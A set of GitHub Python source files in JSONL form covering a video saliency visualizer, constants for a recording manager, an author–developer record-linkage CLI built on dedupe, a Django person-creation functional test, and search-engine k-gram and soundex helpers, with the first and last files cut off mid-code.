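# fixation coordinates and the accident-category mapping for this sequence\n 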
coord_file = os.path.join(root_path, phase, 'coordinate', atype, sequence + '_coordinate.txt')\n mapping_file = os.path.join(root_path, 'mapping.txt')\n \n video_data = get_video_frames(video_file)\n salmap_data = get_video_frames(salmap_file)\n assert len(video_data) == len(salmap_data)\n\n coord_data = read_coord_arrays(coord_file)\n assert len(video_data) == coord_data.shape[0]\n\n map_dicts = read_mapping(mapping_file)\n\n video_writer = cv2.VideoWriter(vis_video_file, cv2.VideoWriter_fourcc(*'DIVX'), fps, (video_data[0].shape[1], video_data[0].shape[0]))\n heatmap = np.zeros_like(video_data[0])\n h, w, c = heatmap.shape\n progress_bar = np.full((barWidth, w, c), (255, 255, 0), np.uint8) # cyan color\n for t, (frame, salmap, fixation) in enumerate(zip(video_data, salmap_data, coord_data)):\n # add saliency heatmap as overlay\n heatmap = cv2.applyColorMap(salmap, cv2.COLORMAP_JET)\n visframe = cv2.addWeighted(frame, 0.7, heatmap, 0.3, 0)\n\n # add colorbar for temporal axis\n step = int(np.ceil(frame.shape[1] / len(video_data)))\n progress_bar[:, 0:t*step, 0] = 0 # fill green color (0, 255, 0)\n\n if fixation[0] != 0 and fixation[1] != 0:\n # add fixation point\n visframe = cv2.drawMarker(visframe, tuple(fixation), (0, 255, 255), markerType=cv2.MARKER_STAR, markerSize=20, thickness=5)\n # add temporal annotations\n progress_bar[:, t*step: min((t+1)*step, w), 0] = 0 # fill red color (0, 0, 255)\n progress_bar[:, t*step: min((t+1)*step, w), 1] = 0\n progress_bar[:, t*step: min((t+1)*step, w), 2] = 255\n # add textual description\n idx = map_dicts['ID_data'].index(int(atype))\n participants = map_dicts['participants'][idx]\n tag1 = 'participants: %s'%(participants[0])\n if len(participants) > 1:\n tag1 += ',' + participants[1]\n tag2 = 'accidents: %s'%(map_dicts['accident'][idx])\n cv2.putText(visframe, tag1, (60, 60), cv2.FONT_HERSHEY_TRIPLEX, 1.5, (0,255,255), 2, cv2.LINE_AA)\n cv2.putText(visframe, tag2, (60, 120), cv2.FONT_HERSHEY_TRIPLEX, 1.5, (0,255,255), 2, cv2.LINE_AA)\n\n visframe[frame.shape[0]-barWidth-1: frame.shape[0]-1, :, :] = cv2.addWeighted(visframe[frame.shape[0]-barWidth-1: frame.shape[0]-1, :, :], 0.3, progress_bar, 0.7, 0)\n # write result video\n video_writer.write(visframe)","repo_name":"Cogito2012/DRIVE","sub_path":"src/visualize_data.py","file_name":"visualize_data.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"76"} +{"seq_id":"7091124477","text":"class Section:\n \"\"\" The different views \"\"\" \n PLANNING = 6\n DOWNLOAD = 7\n \"\"\" Scheduled recordings\"\"\"\n OTRKEY = 0\n \"\"\" Not decoded \"\"\"\n VIDEO_UNCUT = 1\n VIDEO_CUT = 2\n ARCHIVE = 3\n TRASH = 4\n \nclass Action:\n # planning\n PLAN_ADD = 11\n PLAN_REMOVE = 12\n PLAN_EDIT = 13\n PLAN_SEARCH = 14\n # download\n DOWNLOAD_ADD = 16\n DOWNLOAD_ADD_LINK = 17\n DOWNLOAD_START = 18\n DOWNLOAD_STOP = 19\n DOWNLOAD_REMOVE = 20\n # decode and cut\n DECODE = 0\n DECODEANDCUT = 1\n CUT = 2\n # file movement\n DELETE = 3\n ARCHIVE = 4\n RESTORE = 6\n RENAME = 7\n NEW_FOLDER = 8\n REAL_DELETE = 10\n\nclass Cut_action:\n ASK = 0\n BEST_CUTLIST = 1\n CHOOSE_CUTLIST = 2\n MANUALLY = 3\n LOCAL_CUTLIST = 4\n\nclass Status:\n OK = 0\n ERROR = 1\n NOT_DONE = 2\n \nclass Format:\n AVI = 0\n HQ = 1\n MP4 = 2\n HD = 3\n AC3 = 4\n \nclass Program:\n AVIDEMUX = 0\n VIRTUALDUB = 1\n CUT_INTERFACE = 2\n SMART_MKVMERGE = 3\n \nclass DownloadTypes:\n 
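\"\"\" The supported download mechanisms \"\"\"\n 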
TORRENT = 0\n BASIC = 1\n OTR_DECODE = 2\n OTR_CUT = 3 \n \nclass DownloadStatus:\n RUNNING = 0\n STOPPED = 1\n ERROR = 2\n FINISHED = 3\n SEEDING = 4\n","repo_name":"monarc99/otr-verwaltung","sub_path":"otrverwaltung/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"76"} +{"seq_id":"22842688481","text":"#!/usr/bin/env python\n\nimport logging\nfrom uuid import uuid4\n\nimport dedupe\nimport numpy as np\nimport pandas as pd\nimport typer\nfrom sentence_transformers import SentenceTransformer\nfrom sentence_transformers.util import cos_sim\nfrom tqdm import tqdm\n\nfrom rs_graph.bin.typer_utils import setup_logger\nfrom rs_graph.data import (\n DATA_FILES_DIR,\n RS_GRAPH_DEDUPED_REPO_CONTRIBUTORS_PATH,\n RS_GRAPH_LINKED_AUTHORS_DEVS_PATH,\n load_rs_graph_author_contributions_dataset,\n load_rs_graph_deduped_repo_contributors_dataset,\n load_rs_graph_repo_contributors_dataset,\n)\n\n###############################################################################\n\nlog = logging.getLogger(__name__)\n\n###############################################################################\n\napp = typer.Typer()\n\n###############################################################################\n\n\ndef _get_unique_devs_frame_from_dev_contributions(\n dev_contributions_df: pd.DataFrame,\n) -> pd.DataFrame:\n # Each row should be a unique person\n log.info(\"Getting unique developers frame...\")\n unique_devs = []\n for username, group in dev_contributions_df.groupby(\"username\"):\n flat_co_contribs = []\n for co_contribs in group.co_contributors:\n flat_co_contribs.extend(co_contribs)\n\n unique_devs.append(\n {\n \"username\": username,\n \"repos\": tuple(group.repo),\n \"name\": group[\"name\"].iloc[0],\n \"company\": group.company.iloc[0],\n \"email\": group.email.iloc[0],\n \"location\": group.location.iloc[0],\n \"bio\": group.bio.iloc[0],\n \"co_contributors\": tuple(flat_co_contribs),\n }\n )\n\n # Reform as df\n return pd.DataFrame(unique_devs)\n\n\ndef _dataframe_to_joined_str_items(\n df: pd.DataFrame,\n unique_key: str,\n tqdm_desc: str,\n ignore_columns: list[str] | None = None,\n) -> dict[str, str]:\n # Init ignore columns\n if ignore_columns is None:\n ignore_columns = []\n\n joined_str_dict = {}\n for _, row in tqdm(df.iterrows(), desc=tqdm_desc):\n # Convert to dict and convert None values to \"None\" string\n details = row.to_dict()\n for key, value in details.items():\n if value is None:\n details[key] = str(value)\n\n # Construct string\n dev_values_list = []\n for key, value in details.items():\n if key not in ignore_columns:\n if isinstance(value, tuple):\n multi_values = [v for v in value if v is not None]\n value = \", \".join(multi_values)\n\n dev_values_list.append(f\"{key}: {value};\")\n\n # Get unique key value\n try:\n unique_key_value = details[unique_key]\n except KeyError:\n unique_key_value = None\n\n # If no unique key value, create a guid\n if unique_key_value is None:\n # Create a guid\n unique_key_value = str(uuid4())\n\n # Construct string\n joined_str_dict[unique_key_value] = \"\\n\".join(dev_values_list)\n\n return joined_str_dict\n\n\n# @app.command()\n# def create_developer_deduper_dataset_for_annotation(\n# top_n_similar: int = 3,\n# model_name: str = \"BAAI/bge-base-en-v1.5\",\n# debug: bool = False,\n# ) -> None:\n# # Setup logging\n# setup_logger(debug=debug)\n\n# # Load the repo contributors dataset\n# log.info(\"Loading developer 
contributions dataset...\")\n# developer_contributions = load_rs_graph_repo_contributors_dataset()\n\n# # Get unique devs frame\n# unique_devs_df = _get_unique_devs_frame_from_dev_contributions(\n# developer_contributions,\n# )\n\n# # Start the dev comparisons details\n# prepped_devs_list = _dataframe_to_joined_str_items(\n# unique_devs_df,\n# tqdm_desc=\"Converting dev details to strings...\",\n# )\n\n# # Create embeddings for each dev\n# log.info(\"Creating embeddings for each dev...\")\n# model = SentenceTransformer(model_name)\n# dev_embeddings = model.encode(\n# prepped_devs_list,\n# show_progress_bar=True,\n# )\n\n# # Construct pairwise similarity matrix\n# pairwise_similarity_matrix: list[list[float]] = []\n# for dev_embedding in tqdm(\n# dev_embeddings,\n# desc=\"Calculating pairwise similarity matrix\",\n# ):\n# this_dev_similarity_row = []\n# for other_dev_embedding in dev_embeddings:\n# # Cosine similarity\n# similarity = cos_sim(dev_embedding, other_dev_embedding)\n# this_dev_similarity_row.append(similarity.item())\n\n# pairwise_similarity_matrix.append(this_dev_similarity_row)\n\n# # Using the constructed pairwise similarity matrix\n# # Get top n most similar devs using cosine similarity\n# # for every dev (not including themselves)\n# # And finally construct the dev comparison dataframe\n# dev_comparison_rows = []\n# for i in tqdm(\n# range(len(prepped_devs_list)),\n# desc=\"Constructing dev comparison rows\",\n# ):\n# # Get top n most similar devs\n# top_n_similar_devs = sorted(\n# [\n# (j, similarity)\n# for j, similarity in enumerate(pairwise_similarity_matrix[i])\n# if i != j\n# ],\n# key=lambda x: x[1],\n# reverse=True,\n# )[:top_n_similar]\n\n# # Get the dev details\n# dev_details = prepped_devs_list[i]\n\n# # Get the top n most similar dev details\n# top_n_similar_dev_details = []\n# for j, similarity in top_n_similar_devs:\n# top_n_similar_dev_details.append(\n# {\n# \"similarity\": similarity,\n# \"details\": prepped_devs_list[j],\n# }\n# )\n\n# # Add to dev comparison rows\n# for other_dev_details in top_n_similar_dev_details:\n# dev_comparison_rows.append(\n# {\n# \"dev_1_details\": dev_details,\n# \"dev_2_details\": other_dev_details[\"details\"],\n# \"similarity\": other_dev_details[\"similarity\"],\n# }\n# )\n\n# # Convert to dataframe\n# dev_comparison_df = pd.DataFrame(dev_comparison_rows)\n\n# # Store to disk\n# output_filepath = DATA_FILES_DIR / \"developer-deduper-annotation-dataset.csv\"\n# dev_comparison_df.to_csv(output_filepath, index=False)\n\n\n@app.command()\ndef create_author_developer_linker_dataset_for_annotation( # noqa: C901\n top_n_similar: int = 3,\n model_name: str = \"multi-qa-MiniLM-L6-cos-v1\",\n debug: bool = False,\n) -> None:\n # Setup logging\n setup_logger(debug=debug)\n\n # Load the repo contributors dataset\n log.info(\"Loading developer contributions dataset...\")\n devs = load_rs_graph_repo_contributors_dataset()\n\n # Get unique devs frame\n unique_devs_df = _get_unique_devs_frame_from_dev_contributions(\n devs,\n )\n\n # Load the author contributions dataset\n log.info(\"Loading author contributions dataset...\")\n authors = load_rs_graph_author_contributions_dataset()\n\n # Create lookup for repo to authors\n repo_to_authors: dict[str, set[str]] = {}\n author_id_to_name_dict: dict[str, str] = {}\n remade_authors = []\n for _, author in authors.iterrows():\n # Get uuid4 if author has no author id\n if author.author_id is None:\n author.author_id = str(uuid4())\n\n for contribution in author.contributions:\n if 
contribution[\"repo\"] not in repo_to_authors:\n repo_to_authors[contribution[\"repo\"]] = set()\n\n repo_to_authors[contribution[\"repo\"]].add(author.author_id)\n\n remade_authors.append(author)\n\n # Add to name lookup\n author_id_to_name_dict[author.author_id] = author[\"name\"]\n\n # Remake authors\n authors = pd.DataFrame(remade_authors)\n\n # Construct dataframe of author details ready for processing\n log.info(\"Constructing author details dataframe...\")\n authors_ready_rows = []\n for _, author in authors.iterrows():\n repos = {contribution[\"repo\"] for contribution in author.contributions}\n\n # Get all co-authors\n all_co_authors = set()\n for repo in repos:\n # Get author ids from repo_to_authors\n co_author_ids = repo_to_authors[repo]\n\n # Get names from author_id_to_name_dict\n co_author_names = {\n author_id_to_name_dict[author_id] for author_id in co_author_ids\n }\n\n # Add to all co-authors\n all_co_authors.update(co_author_names)\n\n # Remove self from co-authors\n all_co_authors.discard(author[\"name\"])\n\n # Add new author\n authors_ready_rows.append(\n {\n \"author_id\": author.author_id,\n \"name\": author[\"name\"],\n \"repos\": tuple(repos),\n \"co_authors\": tuple(all_co_authors),\n }\n )\n\n # Make frame\n authors_ready = pd.DataFrame(authors_ready_rows)\n\n # Only include the username, name, repos, and co_contributors columns\n # in the unique devs dataframe\n unique_devs_df = unique_devs_df[\n [\"username\", \"name\", \"email\", \"repos\", \"co_contributors\"]\n ].copy()\n\n # Prep devs and authors details for embedding and then comparison\n prepped_devs_dict = _dataframe_to_joined_str_items(\n unique_devs_df,\n unique_key=\"username\",\n tqdm_desc=\"Converting dev details to strings...\",\n )\n prepped_authors_dict = _dataframe_to_joined_str_items(\n authors_ready,\n unique_key=\"author_id\",\n tqdm_desc=\"Converting author details to strings...\",\n ignore_columns=[\"author_id\"],\n )\n\n # Create embeddings for each dev\n log.info(\"Creating embeddings for each dev...\")\n model = SentenceTransformer(model_name)\n dev_embeddings = model.encode(\n list(prepped_devs_dict.values()),\n show_progress_bar=True,\n )\n dev_embeddings_dict = { # noqa: C416\n username: embedding\n for username, embedding in zip(\n prepped_devs_dict.keys(),\n dev_embeddings,\n strict=True,\n )\n }\n\n # Create embeddings for each author\n log.info(\"Creating embeddings for each author...\")\n author_embeddings = model.encode(\n list(prepped_authors_dict.values()),\n show_progress_bar=True,\n )\n author_embeddings_dict = { # noqa: C416\n author_id: embedding\n for author_id, embedding in zip(\n prepped_authors_dict.keys(),\n author_embeddings,\n strict=True,\n )\n }\n\n # For dev, get the authors with shared repos,\n # then take the top n most similar authors\n author_dev_comparison_rows = []\n for username, dev_details in tqdm(\n prepped_devs_dict.items(),\n desc=\"Constructing author-dev comparison rows\",\n ):\n # Get the dev embedding\n dev_embedding = dev_embeddings_dict[username]\n\n # Get the full dev details from the original dataframe\n full_dev_details = unique_devs_df.loc[unique_devs_df.username == username].iloc[\n 0\n ]\n\n # Get list of repos from full dev details\n repos = full_dev_details.repos\n\n # Get the authors with matching repos\n shared_authors = set()\n for repo in repos:\n if repo in repo_to_authors:\n shared_authors.update(repo_to_authors[repo])\n\n if len(shared_authors) == 0:\n continue\n\n # Get the author embeddings\n author_embeddings = [\n 
author_embeddings_dict[author_id] for author_id in shared_authors\n ]\n\n # Get the similarity scores\n similarity_scores = cos_sim(\n dev_embedding,\n author_embeddings,\n )[0].tolist()\n\n # Get the top n most similar authors\n top_n_similar_authors = sorted(\n (\n (author_id, similarity)\n for author_id, similarity in zip(\n shared_authors, similarity_scores, strict=True\n )\n ),\n key=lambda x: x[1],\n reverse=True,\n )[:top_n_similar]\n\n # Get the top n most similar author details\n top_n_similar_author_details = []\n for author_id, similarity in top_n_similar_authors:\n top_n_similar_author_details.append(\n {\n \"similarity\": similarity,\n \"details\": prepped_authors_dict[author_id],\n }\n )\n\n # Add to author-dev comparison rows\n for repo_related_author_details in top_n_similar_author_details:\n author_dev_comparison_rows.append(\n {\n \"dev_details\": dev_details,\n \"author_details\": repo_related_author_details[\"details\"],\n \"similarity\": repo_related_author_details[\"similarity\"],\n }\n )\n\n # Convert to dataframe\n author_dev_comparison_df = pd.DataFrame(author_dev_comparison_rows)\n\n # Store to disk\n output_filepath = DATA_FILES_DIR / \"author-dev-linker-annotation-dataset.csv\"\n author_dev_comparison_df.to_csv(output_filepath, index=False)\n\n\n@app.command()\ndef create_irr_subset_for_author_dev_linker_annotation(\n n: int = 100,\n debug: bool = False,\n) -> None:\n # Setup logging\n setup_logger(debug=debug)\n\n # Load the author-dev linker annotation dataset\n log.info(\"Loading author-dev linker annotation dataset...\")\n author_dev_linker_annotation_df = pd.read_csv(\n DATA_FILES_DIR / \"author-dev-linker-annotation-dataset.csv\",\n )\n\n # Set seed\n np.random.seed(12)\n\n # Get n random rows\n log.info(f\"Getting {n} random rows...\")\n random_rows = author_dev_linker_annotation_df.sample(n=n)\n\n # Store to disk\n output_filepath = DATA_FILES_DIR / \"author-dev-linker-annotation-dataset-irr.csv\"\n random_rows.to_csv(output_filepath, index=False)\n\n\ndef _clustered_devs_dataframe_to_storage_ready(\n clustered_unique_devs_df: pd.DataFrame,\n) -> None:\n # Prepare final dataset that is ready for linkage\n log.info(\"Preparing final dataset for linkage...\")\n processed_rows = []\n for cluster_id, group in clustered_unique_devs_df.groupby(\"cluster_id\"):\n # Get canonical username (longest username)\n canonical_username = \"\"\n for username in group.username:\n if len(username) > len(canonical_username):\n canonical_username = username\n\n # Get all usernames\n all_usernames = group.username.to_list()\n\n # Get all repos\n all_repos = set()\n for repos in group.repos:\n all_repos.update(repos)\n\n # Get all names\n all_names = {name for name in group.name if name is not None}\n\n # Get all companies\n all_companies = {company for company in group.company if company is not None}\n\n # Get all emails\n all_emails = {email for email in group.email if email is not None}\n\n # Get all locations\n all_locations = {\n location for location in group.location if location is not None\n }\n\n # Get all bios\n all_bios = {bio for bio in group.bio if bio is not None}\n\n # Get all co-contributors\n all_co_contributors = set()\n for co_contributors in group.co_contributors:\n all_co_contributors.update(co_contributors)\n\n # Add to processed rows\n processed_rows.append(\n {\n \"canonical_username\": canonical_username,\n \"usernames\": all_usernames,\n \"repos\": all_repos,\n \"names\": all_names,\n \"companies\": all_companies,\n \"emails\": all_emails,\n 
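# A tiny illustration of the per-cluster set-union aggregation performed in\n # this helper (synthetic frame, pandas only; not the project's data):\n #\n # import pandas as pd\n # df = pd.DataFrame({\"cluster_id\": [0, 0, 1],\n # \"emails\": [{\"a@x.io\"}, {\"b@x.io\"}, {\"c@x.io\"}]})\n # merged = df.groupby(\"cluster_id\")[\"emails\"].apply(lambda s: set().union(*s))\n # # cluster 0 -> {\"a@x.io\", \"b@x.io\"}; cluster 1 -> {\"c@x.io\"}\n 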
\"locations\": all_locations,\n \"bios\": all_bios,\n \"co_contributors\": all_co_contributors,\n \"cluster_id\": cluster_id,\n }\n )\n\n # Convert to dataframe\n processed_rows_df = pd.DataFrame(processed_rows)\n processed_rows_df.to_parquet(RS_GRAPH_DEDUPED_REPO_CONTRIBUTORS_PATH)\n log.info(\n f\"Stored deduped repo contributors to: \"\n f\"'{RS_GRAPH_DEDUPED_REPO_CONTRIBUTORS_PATH}'\"\n )\n\n\n@app.command()\ndef train_developer_deduper(debug: bool = False) -> None:\n # Setup logging\n setup_logger(debug=debug)\n\n # Load the repo contributors dataset\n log.info(\"Loading developer contributions dataset...\")\n developer_contributions = load_rs_graph_repo_contributors_dataset()\n\n # Each row should be a unique person\n log.info(\"Getting unique developers frame...\")\n unique_devs = []\n for username, group in developer_contributions.groupby(\"username\"):\n flat_co_contribs = []\n for co_contribs in group.co_contributors:\n flat_co_contribs.extend(co_contribs)\n\n unique_devs.append(\n {\n \"username\": username,\n \"repos\": tuple(group.repo),\n \"name\": group[\"name\"].iloc[0],\n \"company\": group.company.iloc[0],\n \"email\": group.email.iloc[0],\n \"location\": group.location.iloc[0],\n \"bio\": group.bio.iloc[0],\n \"co_contributors\": tuple(flat_co_contribs),\n }\n )\n\n # Reform as df\n unique_devs_df = pd.DataFrame(unique_devs)\n\n # Format as records dict\n developer_records = {i: row.to_dict() for i, row in unique_devs_df.iterrows()}\n\n # Variables for dedupe\n variables = [\n {\"field\": \"username\", \"type\": \"String\"},\n {\"field\": \"repos\", \"type\": \"Set\"},\n {\"field\": \"name\", \"type\": \"Name\", \"has missing\": True},\n {\"field\": \"company\", \"type\": \"String\", \"has missing\": True},\n {\"field\": \"email\", \"type\": \"String\", \"has missing\": True},\n {\"field\": \"location\", \"type\": \"String\", \"has missing\": True},\n {\"field\": \"bio\", \"type\": \"String\", \"has missing\": True},\n {\"field\": \"co_contributors\", \"type\": \"Set\"},\n ]\n\n # Init deduper\n log.info(\"Initializing deduper...\")\n deduper = dedupe.Dedupe(variables)\n\n # Prepare training samples\n log.info(\"Preparing training samples...\")\n deduper.prepare_training(\n developer_records,\n sample_size=int(len(developer_records) * 0.8),\n )\n\n # Start annotating\n log.info(\"Starting annotation...\")\n dedupe.console_label(deduper)\n\n # Train the model\n log.info(\"Training model...\")\n deduper.train()\n\n # Save the model training settings\n train_settings_filepath = (\n DATA_FILES_DIR / \"developer-deduper-training-settings.json\"\n )\n with open(\"train_settings_filepath\", \"w\") as f:\n deduper.write_training(f)\n log.info(\n f\"Stored developer deduper training settings to: '{train_settings_filepath}'\"\n )\n\n # Save the model clustering settings / weights\n cluster_settings_filepath = (\n DATA_FILES_DIR / \"developer-deduper-cluster-settings.pkl\"\n )\n with open(cluster_settings_filepath, \"wb\") as f:\n deduper.write_settings(f)\n log.info(\n f\"Stored developer deduper cluster settings to: '{cluster_settings_filepath}'\"\n )\n\n # Partition the records\n log.info(\"Clustering all records...\")\n clustered_records = deduper.partition(developer_records, threshold=0.5)\n cluster_membership = {}\n for cluster_id, (records, scores) in enumerate(clustered_records):\n for record_id, score in zip(records, scores, strict=True): # type: ignore\n cluster_membership[record_id] = {\n \"cluster_id\": cluster_id,\n \"confidence_score\": score,\n }\n\n # Add cluster 
membership to unique devs dataframe\n clustered_unique_devs = []\n for dev_id, cluster_details in cluster_membership.items():\n dev_details = developer_records[dev_id]\n dev_details[\"cluster_id\"] = cluster_details[\"cluster_id\"]\n dev_details[\"confidence\"] = cluster_details[\"confidence_score\"]\n clustered_unique_devs.append(dev_details)\n\n # Convert to dataframe\n clustered_unique_devs_df = pd.DataFrame(clustered_unique_devs)\n\n # Store clustered unique devs\n output_filepath_for_clustered_unique_devs = (\n DATA_FILES_DIR / \"rs-graph-clustered-unique-devs.parquet\"\n )\n clustered_unique_devs_df.to_parquet(output_filepath_for_clustered_unique_devs)\n log.info(\n f\"Stored clustered unique devs to: \"\n f\"'{output_filepath_for_clustered_unique_devs}'\"\n )\n\n # Log n deduped\n n_clusters = clustered_unique_devs_df.cluster_id.nunique()\n log.info(f\"Number of original 'unique devs': {len(unique_devs_df)}\")\n log.info(f\"Number of deduped 'unique devs': {n_clusters}\")\n diff = len(unique_devs_df) - n_clusters\n log.info(f\"Difference: {diff} ({diff / len(unique_devs_df) * 100:.2f}%)\")\n\n # Prepare final dataset that is ready for linkage\n _clustered_devs_dataframe_to_storage_ready(clustered_unique_devs_df)\n\n\n@app.command()\ndef train_author_developer_linker(debug: bool = False) -> None:\n # Setup logging\n setup_logger(debug=debug)\n\n # Load the repo contributors dataset\n log.info(\"Loading developer contributions dataset...\")\n devs = load_rs_graph_deduped_repo_contributors_dataset()\n\n # Load the author contributions dataset\n log.info(\"Loading author contributions dataset...\")\n authors = load_rs_graph_author_contributions_dataset()\n\n # Construct dataframe of author details ready for processing\n log.info(\"Constructing author details dataframe...\")\n authors_ready_rows = []\n for _, author in authors.iterrows():\n repos = {contribution[\"repo\"] for contribution in author.contributions}\n\n authors_ready_rows.append(\n {\n \"name\": author[\"name\"],\n \"secondary_name\": author[\"name\"], # username comparison\n \"repos\": tuple(repos),\n }\n )\n\n # Make frame\n authors_ready = pd.DataFrame(authors_ready_rows)\n\n # TODO: use None for no name and attach \"has missing\"\n\n # Construct dataframe of developer details ready for processing\n log.info(\"Constructing developer details dataframe...\")\n devs_ready_rows = []\n for _, dev in devs.iterrows():\n canonical_name = \"\"\n for name in dev.names:\n if len(name) > len(canonical_name):\n canonical_name = name\n\n # Catch no names for person\n # use username\n if len(canonical_name) == 0:\n canonical_name = dev.canonical_username\n\n devs_ready_rows.append(\n {\n \"name\": canonical_name,\n \"secondary_name\": dev.canonical_username,\n \"repos\": tuple(dev.repos),\n }\n )\n\n # Make frame\n devs_ready = pd.DataFrame(devs_ready_rows)\n\n # Convert both to records orientation\n author_records = {i: row.to_dict() for i, row in authors_ready.iterrows()}\n dev_records = {i: row.to_dict() for i, row in devs_ready.iterrows()}\n\n # Linker fields\n fields = [\n # author given name <--> github given name (or fallback github username)\n # both string diff and name diff\n {\"field\": \"name\", \"type\": \"String\"},\n {\"field\": \"name\", \"type\": \"Name\"},\n # author given name <--> github username\n {\"field\": \"secondary_name\", \"type\": \"String\"},\n # set repos authored (via JOSS / softwareX) <--> set repos contributed\n {\"field\": \"repos\", \"type\": \"Set\"},\n ]\n\n # Create linker\n linker = 
dedupe.RecordLink(fields)\n\n # Find which dataset had less records\n # and create sample size using 80% of dataset size\n min_dataset_size = min(len(author_records), len(dev_records))\n sample_size = int(min_dataset_size * 0.8)\n\n # Prepare training samples\n log.info(\"Preparing training samples...\")\n linker.prepare_training(author_records, dev_records, sample_size=sample_size)\n\n # Start annotating\n dedupe.console_label(linker)\n\n # Train the model\n linker.train()\n\n # Save the model training settings\n train_settings_filepath = (\n DATA_FILES_DIR / \"author-dev-linker-training-settings.json\"\n )\n with open(train_settings_filepath, \"w\") as f:\n linker.write_training(f)\n\n # Save the model clustering settings / weights\n cluster_settings_filepath = (\n DATA_FILES_DIR / \"author-dev-linker-cluster-settings.pkl\"\n )\n with open(cluster_settings_filepath, \"wb\") as f:\n linker.write_settings(f)\n\n # Join the records\n linked_records = linker.join(author_records, dev_records, threshold=0.0)\n\n # Store linked records\n linked_details_rows = []\n for (author_id, dev_id), confidence in linked_records:\n # Get matching author and dev\n author = authors.loc[author_id]\n dev = devs.loc[dev_id]\n\n # Create linked record\n linked_details_rows.append(\n {\n \"author_id\": author.author_id,\n \"name\": author[\"name\"],\n \"h_index\": author.h_index,\n \"usernames\": dev.usernames,\n \"repos\": dev.repos,\n \"confidence\": confidence,\n }\n )\n\n # Make frame\n linked_details = pd.DataFrame(linked_details_rows)\n\n # Store linked details\n linked_details.to_parquet(RS_GRAPH_LINKED_AUTHORS_DEVS_PATH)\n log.info(f\"Stored linked author-devs to: \" f\"'{RS_GRAPH_LINKED_AUTHORS_DEVS_PATH}'\")\n\n # Log n linked\n n_linked = linked_details.author_id.nunique()\n log.info(f\"Number of linked authors and devs: {n_linked}\")\n\n\n###############################################################################\n\n\ndef main() -> None:\n app()\n\n\nif __name__ == \"__main__\":\n app()\n","repo_name":"evamaxfield/rs-graph","sub_path":"rs_graph/bin/modeling.py","file_name":"modeling.py","file_ext":"py","file_size_in_byte":25868,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"24534754901","text":"from django.contrib.auth.models import Permission\n\nfrom accounts.factories import UserFactory\nfrom functional_tests import pages\nfrom functional_tests.base import FunctionalTestCase\nfrom people.factories import PersonFactory\n\n\nclass PersonCreationTestCase(FunctionalTestCase):\n def setUp(self):\n super().setUp()\n\n # user\n create_person = Permission.objects.filter(name=\"Can add person\")\n view_person = Permission.objects.filter(name=\"Can view person\")\n permissions = create_person | view_person\n self.user = UserFactory(user_permissions=tuple(permissions))\n\n # person\n self.person = PersonFactory.build()\n\n # auth\n self.create_pre_authenticated_session(self.user)\n\n def test_person_creation(self):\n # An authorized user visits the person creation page.\n person_creation_page = pages.PersonCreationPage(self)\n person_creation_page.visit()\n\n # He knows he's in the right place because he can see the name\n # of the site in the title and header\n self.assertEqual(person_creation_page.title, self.SITE_NAME)\n self.assertEqual(person_creation_page.header.title, self.header_title)\n self.assertEqual(person_creation_page.heading, \"Add a person's information\")\n\n # He sees the inputs of the person form, including labels and 
placeholders.\n self.assertEqual(person_creation_page.form.username_label, \"Username*\")\n self.assertEqual(person_creation_page.form.full_name_label, \"Full name*\")\n self.assertEqual(person_creation_page.form.gender_label, \"Gender*\")\n self.assertEqual(\n person_creation_page.form.date_of_birth_label, \"Date of birth*\"\n )\n self.assertEqual(person_creation_page.form.submit_button_label, \"Add\")\n\n # He enters the person's details and submits the form\n person_creation_page.form.enter_username(self.person.username)\n person_creation_page.form.enter_full_name(self.person.full_name)\n person_creation_page.form.select_gender(self.person.get_gender_display())\n person_creation_page.form.enter_dob(str(self.person.dob))\n person_creation_page.form.submit()\n\n # The person's information was added successfully and he is redirected\n # to the person's detail page\n person_detail_page = pages.PersonDetailPage(self, self.person.username)\n self.assertEqual(self.browser.current_url, person_detail_page.url)\n self.assertEqual(\n person_detail_page.messages[0],\n f\"{self.person.username}'s information has been added successfully.\",\n )\n","repo_name":"harisonmg/church-ims","sub_path":"functional_tests/features/test_person_creation.py","file_name":"test_person_creation.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"26609309732","text":"import re\nfrom collections import Counter\n\nfrom search_engine.utils import *\n\n\ndef build_dictionary(documents):\n \"\"\"\n Build dictionary of original word forms (without stemming, but tokenized, lowercased, and only apt words considered)\n :param documents: dict of documents (contents)\n :return: {'word1': freq_word1, 'word2': freq_word2, ...}\n\n \"\"\"\n result = Counter()\n\n for doc in documents:\n tokenized = tokenize(documents[doc].lower())\n for w in tokenized:\n if is_apt_word(w):\n result[w] += 1\n \n return dict(result)\n\n\ndef build_k_gram_index(dictionary, k):\n \"\"\"\n Build index of k-grams for dictionary words. 
Pad with '$' ($word$) before splitting to k-grams\n :param dictionary: dictionary of original words\n :param k: number of symbols in one gram\n :return: {'gram1': ['word1_with_gram1', 'word2_with_gram1', ...],\n 'gram2': ['word1_with_gram2', 'word2_with_gram2', ...], ...}\n \"\"\"\n result = {}\n\n for word in dictionary.keys():\n w = '$' + word + '$'\n if len(w) >= k:\n for i in range(0, len(w) - k + 1):\n gram = w[i: i + k]\n if gram not in result:\n result[gram] = [word]\n else:\n result[gram].append(word)\n \n return result\n \n\ndef generate_wildcard_options(wildcard, k_gram_index):\n \"\"\"\n For a given wildcard return all words matching it using k-grams\n Refer to book chapter 3.2.2\n Don't forget to pad the wildcard with '$' when appropriate\n :param wildcard: query word in a form of a wildcard\n :param k_gram_index: k-gram index built by build_k_gram_index\n :return: list of options (matching words)\n \"\"\"\n result = []\n\n k = len(list(k_gram_index.keys())[0])\n k_grams = build_k_gram_index({wildcard: 0}, k)\n\n wildcard = wildcard.replace('*', '.*')\n setlist = []\n \n for gram in k_grams:\n if gram in k_gram_index:\n matched = set()\n for word in k_gram_index[gram]:\n matching = re.match(wildcard, word)\n if matching and matching.group(0) == word:\n matched.add(word)\n \n if len(matched) > 0:\n setlist.append(matched)\n \n if len(setlist) > 0:\n result = list(set.intersection(*setlist))\n \n return result\n\n\ndef produce_soundex_code(word):\n \"\"\"\n Implement soundex algorithm, version from book chapter 3.4\n :param word: word in lowercase\n :return: soundex 4-character code, like 'k450'\n \"\"\"\n code = [word[0]]\n\n translation = '01230120022455012623010202'\n cur_digit = 